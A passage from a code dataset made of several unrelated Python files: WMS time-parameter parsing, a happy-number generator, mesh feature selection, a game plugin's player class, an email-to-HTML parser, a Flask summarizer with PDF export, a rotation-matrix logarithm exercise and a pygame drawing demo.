return matching_times[0]\n else:\n raise WMSException(\n \"Time dimension range '%s'-'%s' not valid for this layer\" % (start, end),\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n elif not times[0]:\n # default to last available time if not supplied.\n product_times = get_times_for_product(product)\n return product_times[-1]\n try:\n time = parse(times[0]).date()\n except ValueError:\n raise WMSException(\n \"Time dimension value '%s' not valid for this layer\" % times[0],\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n\n # Validate time parameter for requested layer.\n if time not in product.ranges[\"time_set\"]:\n raise WMSException(\n \"Time dimension value '%s' not valid for this 
layer\" % times[0],\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n return time\n\n\ndef parse_time_delta(delta_str):\n pattern = (r'P((?P<years>\\d+)Y)?((?P<months>\\d+)M)?((?P<days>\\d+)D)?'\n r'(T(((?P<hours>\\d+)H)?((?P<minutes>\\d+)M)?((?P<seconds>\\d+)S)?)?)?')\n parts = re.search(pattern, delta_str).groupdict()\n return relativedelta(**{k: float(v) for k, v in parts.items() if v is not None})\n\n\ndef parse_wms_time_string(t, start=True):\n if t.upper() == 'PRESENT':\n return datetime.utcnow()\n elif t.startswith('P'):\n return parse_time_delta(t)\n else:\n default = datetime(1970, 1, 1) if start else datetime(1970, 12, 31, 23, 23, 59, 999999) # default year ignored\n return parse(t, default=default)\n\n\ndef parse_wms_time_strings(parts):\n start = parse_wms_time_string(parts[0])\n end = parse_wms_time_string(parts[-1], start=False)\n\n a_tiny_bit = relativedelta(microseconds=1)\n # Follows GeoServer https://docs.geoserver.org/stable/en/user/services/wms/time.html#reduced-accuracy-times\n\n if isinstance(start, relativedelta):\n if isinstance(end, relativedelta):\n raise WMSException(\n \"Could not understand time value '%s'\" %parts,\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n fuzzy_end=parse_wms_time_string(parts[-1], start=True)\n return fuzzy_end - start + a_tiny_bit, end\n if isinstance(end, relativedelta):\n return start, start + end - a_tiny_bit\n return start, end\n\n\ndef bounding_box_to_geom(bbox, bb_crs, target_crs):\n poly = geometry.polygon([\n (bbox.left, bbox.top),\n (bbox.left, bbox.bottom),\n (bbox.right, bbox.bottom),\n (bbox.right, bbox.top),\n (bbox.left, bbox.top),\n ], bb_crs)\n return poly.to_crs(target_crs)\n\n\nclass GetParameters():\n def __init__(self, args):\n self.cfg = get_config()\n # Version\n self.version = get_arg(args, \"version\", \"WMS version\",\n permitted_values=['1.1.1', '1.3.0'])\n # CRS\n if self.version == '1.1.1':\n crs_arg = \"srs\"\n else:\n crs_arg = \"crs\"\n self.crsid = get_arg(args, crs_arg, \"Coordinate Reference System\",\n errcode=WMSException.INVALID_CRS,\n permitted_values=list(self.cfg.published_CRSs))\n self.crs = self.cfg.crs(self.crsid)\n # Layers\n self.product = self.get_product(args)\n\n self.geometry = _get_polygon(args, self.crs)\n # BBox, height and width parameters\n self.geobox = _get_geobox(args, self.crs)\n # Time parameter\n self.times = get_times(args, self.product)\n\n self.method_specific_init(args)\n\n def method_specific_init(self, args):\n pass\n\n def get_product(self, args):\n return get_product_from_arg(args)\n\n\nclass GetLegendGraphicParameters():\n def __init__(self, args):\n self.product = get_product_from_arg(args, 'layer')\n\n # Validate Format parameter\n self.format = get_arg(args, \"format\", \"image format\",\n errcode=WMSException.INVALID_FORMAT,\n lower=True,\n permitted_values=[\"image/png\"])\n arg_styles = args.get(\"styles\", None)\n if arg_styles:\n # Styles\n try:\n self.styles = [\n self.product.style_index[style_name]\n for style_name in arg_styles.split(\",\")\n ]\n except KeyError as e:\n raise WMSException(\n f\"Style {e} not valid for layer.\",\n WMSException.STYLE_NOT_DEFINED,\n locator=\"STYLES parameter\"\n )\n else:\n self.styles = [self.product.default_style]\n # Time parameter\n self.times = get_times(args, self.product)\n\n\nclass GetMapParameters(GetParameters):\n def method_specific_init(self, args):\n # Validate Format parameter\n self.format = get_arg(args, \"format\", \"image format\",\n errcode=WMSException.INVALID_FORMAT,\n lower=True,\n 
permitted_values=[\"image/png\"])\n # Styles\n self.styles = args.get(\"styles\", \"\").split(\",\")\n if len(self.styles) != 1:\n raise WMSException(\"Multi-layer GetMap requests not supported\")\n style_r = self.styles[0]\n if not style_r:\n style_r = self.product.default_style.name\n self.style = self.product.style_index.get(style_r)\n if not self.style:\n raise WMSException(\"Style %s is not defined\" % style_r,\n WMSException.STYLE_NOT_DEFINED,\n locator=\"Style parameter\",\n valid_keys=list(self.product.style_index))\n cfg = get_config()\n if self.geobox.width > cfg.wms_max_width:\n raise WMSException(f\"Width {self.geobox.width} exceeds supported maximum {self.cfg.wms_max_width}.\",\n locator=\"Width parameter\")\n if self.geobox.height > cfg.wms_max_height:\n raise WMSException(f\"Width {self.geobox.height} exceeds supported maximum {self.cfg.wms_max_height}.\",\n locator=\"Height parameter\")\n\n # Zoom factor\n self.zf = zoom_factor(args, self.crs)\n\n self.ows_stats = bool(args.get(\"ows_stats\"))\n\n # TODO: Do we need to make resampling method configurable?\n self.resampling = Resampling.nearest\n\n\nclass GetFeatureInfoParameters(GetParameters):\n def get_product(self, args):\n return get_product_from_arg(args, \"query_layers\")\n\n def method_specific_init(self, args):\n # Validate Formata parameter\n self.format = get_arg(args, \"info_format\", \"info format\", lower=True,\n errcode=WMSException.INVALID_FORMAT,\n permitted_values=[\"application/json\"])\n # Point coords\n if self.version == \"1.1.1\":\n coords = [\"x\", \"y\"]\n else:\n coords = [\"i\", \"j\"]\n i = args.get(coords[0])\n j = args.get(coords[1])\n if i is None:\n raise WMSException(\"HorizontalCoordinate not supplied\", WMSException.INVALID_POINT,\n \"%s parameter\" % coords[0])\n if j is None:\n raise WMSException(\"Vertical coordinate not supplied\", WMSException.INVALID_POINT,\n \"%s parameter\" % coords[0])\n self.i = int(i)\n self.j = int(j)\n\n\n# Solar angle correction functions\ndef declination_rad(dt):\n # Estimate solar declination from a datetime. 
(value returned in radians).\n # Formula taken from https://en.wikipedia.org/wiki/Position_of_the_Sun#Declination_of_the_Sun_as_seen_from_Earth\n timedel = dt - datetime(dt.year, 1, 1, 0, 0, 0, tzinfo=utc)\n day_count = timedel.days + timedel.seconds / (60.0 * 60.0 * 24.0)\n return -1.0 * math.radians(23.44) * math.cos(2 * math.pi / 365 * (day_count + 10))\n\n\ndef cosine_of_solar_zenith(lat, lon, utc_dt):\n # Estimate cosine of solar zenith angle\n # (angle between sun and local zenith) at requested latitude, longitude and datetime.\n # Formula taken from https://en.wikipedia.org/wiki/Solar_zenith_angle\n utc_seconds_since_midnight = ((utc_dt.hour * 60) + utc_dt.minute) * 60 + utc_dt.second\n utc_hour_deg_angle = (utc_seconds_since_midnight / (60 * 60 * 24) * 360.0) - 180.0\n local_hour_deg_angle = utc_hour_deg_angle + lon\n local_hour_angle_rad = math.radians(local_hour_deg_angle)\n latitude_rad = math.radians(lat)\n solar_decl_rad = declination_rad(utc_dt)\n result = math.sin(latitude_rad) * math.sin(solar_decl_rad) \\\n + math.cos(latitude_rad) * math.cos(solar_decl_rad) * math.cos(local_hour_angle_rad)\n return result\n\n\ndef solar_correct_data(data, dataset):\n # Apply solar angle correction to the data for a dataset.\n # See for example http://gsp.humboldt.edu/olm_2015/Courses/GSP_216_Online/lesson4-1/radiometric.html\n native_x = (dataset.bounds.right + dataset.bounds.left) / 2.0\n native_y = (dataset.bounds.top + dataset.bounds.bottom) / 2.0\n pt = geometry.point(native_x, native_y, dataset.crs)\n crs_geo = geometry.CRS(\"EPSG:4326\")\n geo_pt = pt.to_crs(crs_geo)\n data_time = dataset.center_time.astimezone(utc)\n data_lon, data_lat = geo_pt.coords[0]\n\n csz = cosine_of_solar_zenith(data_lat, data_lon, data_time)\n\n return data / csz\n\n\ndef wofls_fuser(dest, src):\n where_nodata = (src & 1) == 0\n numpy.copyto(dest, src, where=where_nodata)\n return dest\n\n\ndef item_fuser(dest, src):\n where_combined = numpy.isnan(dest) | (dest == -6666.)\n numpy.copyto(dest, src, where=where_combined)\n return dest\n\n\ndef collapse_datasets_to_times(datasets, times, tz):\n available_dates = datasets.coords[\"time\"].values\n collapsed = []\n selected_dates = []\n for i, dt in enumerate(times):\n npdt = numpy.datetime64(dt)\n if npdt not in available_dates:\n # TODO: Improve efficiency for large available date sets!\n npdt = None\n for avnpdt in available_dates:\n av_dt = datetime.utcfromtimestamp(avnpdt.astype(int) * 1e-9)\n av_date = solar_date(av_dt, tz)\n if av_date == dt:\n npdt = avnpdt\n break\n if not npdt:\n continue\n selected_dates.append(npdt)\n dss = datasets.sel(time=npdt)\n dssv = dss.values\n collapsed.append(tuple(dssv.tolist()))\n\n nparray = numpy.empty(len(selected_dates), dtype=object)\n for i, dss in enumerate(collapsed):\n nparray[i] = dss\n return xarray.DataArray(\n nparray,\n dims=[\"time\"],\n coords=[selected_dates]\n )\n\n","sub_path":"datacube_ows/wms_utils.py","file_name":"wms_utils.py","file_ext":"py","file_size_in_byte":17693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353716873","text":"def is_happy(num):\n seq = []\n while num != 1:\n num = sum(map(lambda x: x**2, map(int, str(num))))\n if num in seq:\n return False\n seq.append(num)\n return True\n\n\ndef happy_numbers():\n \"\"\"\n Generator which returns happy numbers.\n \"\"\"\n num = 0\n while True:\n num += 1\n if is_happy(num):\n yield num\n\n\ndef main():\n for i in happy_numbers():\n print(i)\n\n\nif __name__ == '__main__':\n 
main()","sub_path":"Numbers/happynumbers/happynumbers.py","file_name":"happynumbers.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483442773","text":"from abc import ABCMeta, abstractclassmethod\nimport numpy\nimport trimesh\nclass FeatureSelectionStrategy(metaclass = ABCMeta):\n @abstractclassmethod\n def select_features(self):\n pass\n\n\n\nclass AveragePickUpVertices(FeatureSelectionStrategy): \n def __init__(self, mesh, quantity=40):\n self.mesh = mesh\n self.quantity = quantity\n self.vertices = None\n\n def select_features(self):\n selected_index = []\n iter_time = 0\n dtype = [('x', float), ('y', float), ('z', float)]\n vertices_seq = numpy.array([tuple(vertices) for vertices in self.mesh.vertices], dtype= dtype)\n vertices_seq = numpy.array([list(vertices) for vertices in numpy.sort(vertices_seq, order=['y', 'x', 'z'])])\n for index, point in enumerate(vertices_seq):\n if len(selected_index) >= self.quantity:\n break\n if self.__is_maintain_distance(point, vertices_seq[selected_index], 30): \n selected_index.append(index)\n \n #draw the points on mesh\n #print(\"length of selected: \", len(selected_index))\n self.__visual_selected_points(self.mesh, vertices_seq[selected_index])\n return vertices_seq[selected_index]\n \n #private\n def __count_distance(self, p1, p2):\n return numpy.power(numpy.sum(numpy.square(numpy.array(p1) - numpy.array(p2))), 0.5)\n\n def __is_maintain_distance(self, point, selected_points, distance):\n for selected_point in selected_points:\n if self.__count_distance(point, selected_point) < distance:\n return False\n return True\n\n \n def __visual_selected_points(self, mesh, selected_points, selected_color=[255,0,0,0],\n not_selected_color=[0,255,0,0]):\n for vertices in selected_points:\n index, j = numpy.where(mesh.vertices== vertices) \n mesh.visual.vertex_colors[index[0]] = selected_color\n \nclass OnlyPickNose(FeatureSelectionStrategy):\n def __init__(self, mesh, nose_index=100):\n self.mesh = mesh\n self.nose_index = nose_index\n\n def select_features(self):\n return [self.mesh.vertices[self.nose_index]]\n\n# def _find_point_in_witch_triangle(self, mesh, point):\n# for triangle in mesh.triangles:\n# part_triangle_1 = count_triangle_area([point, triangle[0], triangle[1]])\n# part_triangle_2 = count_triangle_area([point, triangle[1], triangle[2]])\n# part_triangle_3 = count_triangle_area([point, triangle[0], triangle[2]])\n# if triangle.area == (part_triangle_1 + part_triangle_2 + part_triangle_3):\n# return triangle\n# # return None\n# def count_triangle_area(self, vertices):\n# a = self.count_distance(vertices[0], vertices[1])\n# b = self.count_distance(vertices[0], vertices[2])\n# c = self.count_distance(vertices[1], vertices[2])\n# s = (a+b+c)/2\n# return pow(s*(s-a)*(s-b)*(s-c), 0.5)\n \n# def hog(self, mesh, mask_size=(2,2)):\n# x_min = mesh.vertices[np.argmin(mesh.vertices[:, 0])][0]\n# y_min = mesh.vertices[np.argmin(mesh.vertices[:, 1])][1]\n# x_max = mesh.vertices[np.argmax(mesh.vertices[:, 0])][0]\n# y_max = mesh.vertices[np.argmax(mesh.vertices[:, 1])][1]\n# print(\"x range:\", x_min, x_max, \"y range:\", y_min, y_max)\n# sampling_frequency = 1.0\n# for y in range(y_min, y_max, mask_size[1]):\n# for x in range(x_min, x_max, mask_size[0]):\n\n# class TestFeaturesSelector(unittest.TestCase):\n# @classmethod\n# def setUp(self):\n# self.selected_points = [[0, 7, 10], [2, 6, 10], [3, 4, 9]]\n# self.vertices = [[0, 0, 0], [2, 2, 4], [3, 3, 0], [4, 
1, 4]]\n# self.FS = FeaturesSelector()\n \n# def test_count_distance(self):\n# self.assertAlmostEqual(self.FS.count_distance(self.vertices[0], self.vertices[1]), 4.8989, places=3)\n# self.assertAlmostEqual(self.FS.count_distance(self.vertices[0], self.vertices[2]), 4.2426, places=3)\n \n# def test_is_maintain_distance(self):\n# self.assertTrue(self.FS.is_maintain_distance(self.vertices[0], self.selected_points, 10))\n# self.assertFalse(self.FS.is_maintain_distance(self.vertices[1], self.selected_points, 10))\n# unittest.main(argv=[''], verbosity=2, exit=False)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"546843397","text":"# ======================================================================\n# >> IMPORTS\n# ======================================================================\n\n# Hero-Wars\nfrom hw.database import save_player_data\nfrom hw.database import load_player_data\nfrom hw.database import save_hero_data\n\nfrom hw.entities import Hero\n\nfrom hw.tools import find_element\n\nfrom hw.configs import starting_heroes\nfrom hw.configs import player_entity_class\n\n# Source.Python\nfrom players.helpers import index_from_userid\n\nfrom memory import make_object\nfrom memory.hooks import HookType\n\nfrom entities import TakeDamageInfo\nfrom entities.helpers import index_from_pointer\n\nfrom events import Event\n\nfrom weapons.entity import WeaponEntity\n\nfrom engines.server import engine_server\n\n\n# ======================================================================\n# >> GLOBALS\n# ======================================================================\n\n_player_data = {}\n_is_hooked = False\n\n\n# ======================================================================\n# >> GAME EVENTS\n# ======================================================================\n\n@Event\ndef player_disconnect(game_event):\n \"\"\"Saves player's data upon disconnect.\"\"\"\n\n userid = game_event.get_int('userid')\n player = Player.from_userid(userid)\n save_player_data(player)\n del _player_data[userid]\n\n\n@Event\ndef player_spawn(game_event):\n \"\"\"Saves player's data upon spawning.\"\"\"\n\n player = Player.from_userid(game_event.get_int('userid'))\n save_player_data(player)\n\n\n# ======================================================================\n# >> HOOKS\n# ======================================================================\n\ndef _weapon_bump(args):\n \"\"\"\n Hooked to a function that is fired any time a weapon is\n requested to be picked up in game.\n \"\"\"\n\n player_index = index_from_pointer(args[0])\n weapon_index = index_from_pointer(args[1])\n weapon = WeaponEntity(weapon_index)\n player = Player(player_index)\n eargs = {'weapon': weapon, 'player': player}\n if weapon.classname in player.restrictions:\n player.hero.execute_skills('weapon_pickup_fail', **eargs)\n return False\n else:\n player.hero.execute_skills('weapon_pickup', **eargs)\n\n\ndef _on_take_damage(args):\n \"\"\"\n Hooked to a function that is fired any time an\n entity takes damage.\n \"\"\"\n\n player_index = index_from_pointer(args[0])\n info = make_object(TakeDamageInfo, args[1])\n defender = Player(player_index)\n attacker = None if not info.attacker else Player(info.attacker)\n eargs = {\n 'attacker': attacker,\n 'defender': defender,\n 'info': info\n }\n if not player_index == info.attacker:\n 
defender.hero.execute_skills('player_pre_defend', **eargs)\n attacker.hero.execute_skills('player_pre_attack', **eargs)\n\n\n# ======================================================================\n# >> CLASSES\n# ======================================================================\n\nclass Player(player_entity_class):\n \"\"\"Player class for Hero-Wars related activity and data.\n\n Attributes:\n gold: Player's Hero-Wars gold, used to purchase heroes and items\n hero: Player's hero currently in use\n heroes: List of owned heroes\n \"\"\"\n\n @classmethod\n def from_userid(cls, userid):\n \"\"\"Returns a Player instance from an userid.\n\n Args:\n userid: Userid of the player\n \"\"\"\n\n return cls(index_from_userid(userid))\n\n def __init__(self, index):\n \"\"\"Initializes a new player instance.\n\n Args:\n index: Index of the player\n \"\"\"\n\n super().__init__(index)\n\n # Create player's data dict\n if self.userid not in _player_data:\n _player_data[self.userid] = {\n 'gold': 0,\n 'hero': None,\n 'heroes': [],\n 'restrictions': set()\n }\n\n # Load player's data\n load_player_data(self)\n\n # Make sure the player gets his starting heroes\n heroes = Hero.get_subclasses()\n for cid in starting_heroes:\n hero_cls = find_element(heroes, 'cid', cid)\n if hero_cls and not find_element(self.heroes, 'cid', cid):\n self.heroes.append(hero_cls())\n\n # Make sure the player has a hero\n if not self.hero:\n self.hero = self.heroes[0]\n\n # Hooks :3\n global _is_hooked\n if _is_hooked is False:\n self.bump_weapon.add_hook(HookType.PRE, _weapon_bump)\n self.on_take_damage.add_hook(HookType.PRE, _on_take_damage)\n _is_hooked = True\n\n @property\n def gold(self):\n \"\"\"Getter for player's Hero-Wars gold.\n\n Returns:\n Player's gold\n \"\"\"\n\n return _player_data[self.userid]['gold']\n\n @gold.setter\n def gold(self, gold):\n \"\"\"Setter for player's Hero-Wars gold.\n\n Raises:\n ValueError: If gold is set to a negative value\n \"\"\"\n\n if gold < 0:\n raise ValueError('Attempt to set negative gold for a player.')\n _player_data[self.userid]['gold'] = gold\n\n @property\n def hero(self):\n \"\"\"Getter for player's current hero.\n\n Returns:\n Player's hero\n \"\"\"\n\n return _player_data[self.userid]['hero']\n\n @hero.setter\n def hero(self, hero):\n \"\"\"Setter for player's current hero.\n\n Makes sure player owns the hero and saves his current hero to\n the database before switching to the new one.\n\n Args:\n hero: Hero to switch to\n\n Raises:\n ValueError: Hero not owned by the player\n \"\"\"\n\n # Make sure player owns the hero\n if hero not in self.heroes:\n raise ValueError('Hero {cid} not owned by {steamid}.'.format(\n cid=hero.cid, steamid=self.steamid\n ))\n\n # Make sure the hero is different than player's current hero\n if hero == self.hero:\n return\n\n # If player has a current hero\n if self.hero:\n\n # Save current hero's data\n save_hero_data(self.steamid, self.hero)\n\n # Destroy current hero's items\n for item in self.hero.items:\n if not item.permanent:\n self.hero.items.remove(item)\n\n # Slay the player\n engine_server.client_command(self.edict, 'kill', True)\n\n # Change to the new hero\n _player_data[self.userid]['hero'] = hero\n\n # Reset current restrictions\n self.restrictions.clear()\n\n @property\n def heroes(self):\n \"\"\"Getter for player's heroes.\n\n Returns:\n A list of player's heroes.\n \"\"\"\n\n return _player_data[self.userid]['heroes']\n\n @property\n def restrictions(self):\n \"\"\"Getter for player's restrictions.\n\n Returns:\n A set of 
player's restricted weapons\n \"\"\"\n\n return _player_data[self.userid]['restrictions']\n\n @restrictions.setter\n def restrictions(self, restrictions):\n \"\"\"Setter for player's restrictions.\"\"\"\n\n self.restrictions.clear()\n self.restrictions.update(set(restrictions))\n","sub_path":"addons/source-python/plugins/hw/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"559685188","text":"######################################################################## \n'''\nGiven a list of adjectives and a list of nouns, generates a list of \nnicknames with a specified number of syllables\n'''\n\n## header ### \n__author__ = \"Jenhan Tao\" \n__license__ = \"BSD\" \n__email__ = \"jenhantao@gmail.com\" \n\n### imports ### \nimport sys\nfrom itertools import product\n\n### functions ###\ndef countSyllables(word):\n '''\n taken from:http://stackoverflow.com/questions/14541303/count-the-number-of-syllables-in-a-word\n '''\n count = 0\n vowels = 'aeiouy'\n word = word.lower().strip(\".:;?!\")\n if word[0] in vowels:\n count +=1\n for index in range(1,len(word)):\n if word[index] in vowels and word[index-1] not in vowels:\n count +=1\n if word.endswith('e'):\n count -= 1\n if word.endswith('le'):\n count+=1\n if count == 0:\n count +=1\n return count\n\ndef makeNicknames(adjList, nounList, numSyllables):\n '''\n Given a list of adjectives and a list of nouns, generates a list of \n nicknames with a specified number of syllables\n inputs: list of adjectives, list of nouns, number of syllables that \n should appear in nickname\n outputs: prints a list of nicknames satisfying syllable requirements \n to standard out\n '''\n\n # compute cartesian product\n wordPairs = product(adjList, nounList, repeat=1)\n for wp in wordPairs:\n totalSyllables2 = 0\n adjSyl = []\n for w in wp[0].split():\n totalSyllables2 += countSyllables(w)\n \n nounSyl = []\n for w in wp[1].split():\n totalSyllables2 += countSyllables(w)\n\n# print(\"****\")\n# print(wp)\n# print(adjSyl)\n# print(nounSyl)\n# print(totalSyllables, totalSyllables3)\n if totalSyllables2 < numSyllables:\n # word pair satisfies requirement, just print it out\n print(\" \".join([str(x) for x in wp]))\n \n \n\n\n\n### main method ###\nif __name__ == \"__main__\":\n # read in arguments\n if len(sys.argv) < 4:\n print(\"Incorrect number of arguments\")\n print(\"Usage:\")\n print(\"python nickNameGenerator (noun list) (adjective list)\" +\n \" (total syllables, default = 4)\")\n else:\n adjListPath = sys.argv[1]\n nounListPath = sys.argv[2]\n numSyllables = int(sys.argv[3])\n\n # read in adjectives\n with open(adjListPath) as f:\n data = f.readlines()\n adjList = [unicode(line.strip()) for line in data]\n\n # read in nouns\n with open(nounListPath) as f:\n data = f.readlines()\n nounList = [unicode(line.strip()) for line in data]\n\n makeNicknames(adjList, nounList, numSyllables)\n","sub_path":"nickNameGenerator.py","file_name":"nickNameGenerator.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"197648089","text":"# plugins/save.py\nimport logging\nimport shutil\nfrom pyats.easypy.plugins.bases import BasePlugin\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass CopyReport(BasePlugin):\n\n def __init__(self, directory, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._source = directory\n 
self._dest = 'custom-data'\n\n def post_job(self, job):\n logger.info('The directory to copy: %s; destination: %s', self._source, self._dest)\n shutil.copytree(self._source, f'{job.runtime.directory}/{self._dest}')\n","sub_path":"training/pyats06/plugins/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"558611625","text":"# https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html\n# https://www.ietf.org/rfc/rfc2183.txt\n# https://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html\n\nimport abc\nimport email\nimport html\nimport bleach # https://github.com/mozilla/bleach\n\n\nclass MyEmailParser(object, metaclass=abc.ABCMeta):\n def __init__(self, email_str):\n self.msg = email.message_from_string(email_str, policy=None)\n\n # WARNING: This may return a .php file, store outside the document root\n # Returns cleaned (\"safe\") HTML code\n # By the say it saves attached files\n def to_html(self):\n if self.msg.is_multipart():\n return self.multipart_to_html()\n else:\n return self.nonmultipart_to_html()\n\n # Internal\n def multipart_to_html(self):\n text = ''\n files = []\n for part in self.msg.walk():\n subtext, subfiles = self.msg_to_html(part)\n if self.msg.get_content_type() == 'multipart/alternative':\n if part.get_content_type() in ('text/html',\n 'application/xhtml+xml',\n 'text/html'):\n text = subtext\n files = subfiles\n else:\n if text and subtext:\n text += \"\\n
    \\n\"\n text += subtext\n files.append(subfiles)\n return text, files\n\n # Internal\n def nonmultipart_to_html(self):\n content = self.msg.get_payload(decode=True)\n if self.msg.get_content_disposition() == 'attachment' or \\\n (not self.msg.get_content_disposition() and self.msg.get_filename()):\n return '', [self.store_file(content, self.msg.get_filename())]\n if self.msg.get_content_type() == 'text/plain':\n return html.escape(content), []\n elif self.msg.get_content_type() in ('text/html', 'application/xhtml+xml'):\n return bleach.clean(content, strip=True, strip_comments=True), []\n return \"\", []\n\n # Note that filename may be None\n @abc.abstractmethod\n def store_file(self, content, filename):\n pass\n # filename = self.dir_for_files + '/' + filename\n # with open(filename, \"w\") as fh:\n # fh.write(content)\n # return filename\n","sub_path":"ouremail/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"418300298","text":"from flask import Flask,render_template,request,make_response,abort, redirect, url_for,session,escape\r\nfrom temp_nltk import url_rize\r\nimport pdfkit\r\nimport re\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'any random string'\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n\treturn render_template('index1.html')\r\n\r\n@app.route('/success',methods=['GET','POST'])\r\ndef analyze():\r\n\tif request.method == 'POST':\r\n\t\tsession['key'] = 'Key Points'\r\n\t\trawtext = request.form['raw']\r\n\t\ttypesum = request.form['typesum']\r\n\t\tprotext = url_rize(rawtext,typesum)\r\n\t\tsession['title'] = protext[1]\r\n\t\tsession['para'] = protext[0]\r\n\t\tsession['lists'] = protext[2]\r\n\t\trend = render_template('index2.html',rawe=protext[0],title=protext[1],lists=protext[2],key=session['key'])\r\n\t\treturn rend\r\n\r\n@app.route('/indexnew')\r\ndef indexnew():\r\n\tconfig = pdfkit.configuration(wkhtmltopdf='./bin/wkhtmltopdf')\r\n\trender = render_template('pdf.html',para=session['para'],title=session['title'],lists=session['lists'],key=session['key'])\r\n\tpdf = pdfkit.from_string(render, False, configuration=config)\r\n\tresponse = make_response(pdf)\r\n\tresponse.headers['Content-Type'] = 'application/pdf'\r\n\tresponse.headers['Content-Disposition'] = 'attachment; filename=summary.pdf'\r\n\treturn (response)\r\n@app.route('/pdf',methods=['GET','POST'])\r\ndef pdf():\r\n\tif request.method == 'POST':\r\n\t\r\n\t\treturn (redirect(url_for('indexnew')))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"432692610","text":"import numpy as np\nfrom math import cos, acos, sin, tan, pi, sqrt\n\n#original matrix\nm = np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n#comparison matrix\ni = np.array([[0, -1.20919958, 1.20919958], [1.20919958, 0, -1.20919958], [-1.20919958, 1.20919958, 0]])\n#epsilon\ne = 10**-6\n\ndef NearZero(z):\n\treturn abs(z) < 1e-6\n\ndef MatrixLog3(R):\n\tif NearZero(np.linalg.norm(R - np.eye(3))):\n\t\treturn np.zeros(3,3)\n\telif NearZero(np.trace(R) + 1):\n\t\tif not NearZero(1 + R[2][2]):\n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[2][2]))) \\\n\t\t\t\t* np.array([R[0][2], R[1][2], 1 + R[2][2]])\n\t\telif not NearZero(1 + R[1][1]): \n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[1][1]))) \\\n\t\t\t\t* np.array([R[0][1], 1 + R[1][1], 
R[2][1]])\n\t\telse:\n\t\t\tomg = (1.0 / sqrt(2 * (1 + R[0][0]))) \\\n\t\t\t\t* np.array([1 + R[0][0], R[1][0], R[2][0]])\n\t\treturn VecToso3(pi*omg)\n\telse:\n\t\tacosinput = (np.trace(R) - 1) / 2.0\n\t\tif acosinput > 1:\n\t\t\tacosinput = 1\n\t\telif acosinput < -1:\n\t\t\tacosinput = -1\t\t\n\t\ttheta = acos(acosinput)\n\t\treturn theta / 2.0 / sin(theta) * (R - np.array(R).T)\n\n#creating so(3) representation of expontential coordinates\nso3 = MatrixLog3(m)\ndifResult = so3 - i\n\n#comparing matrix\ndef compare(test):\n\tif(test.all() == m.all()):\n\t\tprint(\"True: the matrix matches\")\n\t\tprint(test)\n\t\treturn True\n\telse:\n\t\tprint(\"False: the matrix does not match\")\n\t\tprint(test)\n\t\treturn False\n\n#comparing epsilon\ndef threshold(test2):\n\tif(test2.all() <= e):\n\t\tprint(\"True: it is less than epsilon (10^-6)\")\n\t\tprint(test2)\n\t\treturn True\n\telse:\n\t\tprint(\"False: it is not less than epsilon (10^-6)\")\n\t\tprint(test2)\n\t\treturn False\n\nresult = compare(so3)\nepsilon = threshold(difResult)\n","sub_path":"KevinsCode/Lab3/ex3.45.py","file_name":"ex3.45.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"330693682","text":"\"\"\" drawDemo.py\r\n demonstrate using the drawing\r\n features in pygame\"\"\"\r\n\r\nimport pygame, math\r\npygame.init()\r\n\r\ndef drawStuff (background):\r\n \"\"\" given a surface, draws a bunch of things on it \"\"\"\r\n\r\n #draw a line from (5, 100) to (100, 100)\r\n pygame.draw.line(background, (255, 0, 0), (5, 100), (100, 100))\r\n\r\n #draw an unfilled square\r\n pygame.draw.rect(background, (0, 255, 0), ((200, 5), (100, 100)), 3)\r\n\r\n #draw a filled circle\r\n pygame.draw.circle(background, (0, 0, 255), (400, 50), 45)\r\n\r\n #draw an arc\r\n pygame.draw.arc(background, (0, 0, 0), ((5, 150), (100, 100)), 0, math.pi/2, 5)\r\n\r\n #draw an ellipse\r\n pygame.draw.ellipse(background, (0xCC, 0xCC, 0x00), ((150, 150), (150, 100)), 0)\r\n\r\n #draw lines,\r\n points = (\r\n (370, 160),\r\n (370, 237),\r\n (372, 193),\r\n (411, 194),\r\n (412, 237),\r\n (412, 160),\r\n (412, 237),\r\n (432, 227),\r\n (436, 196),\r\n (433, 230)\r\n )\r\n \r\n pygame.draw.lines(background, (0xFF, 0x00, 0x00), False, points, 3)\r\n\r\n #draw polygon\r\n points = (\r\n (137, 372),\r\n (232, 319),\r\n (383, 335),\r\n (442, 389),\r\n (347, 432),\r\n (259, 379),\r\n (220, 439),\r\n (132, 392),\r\n 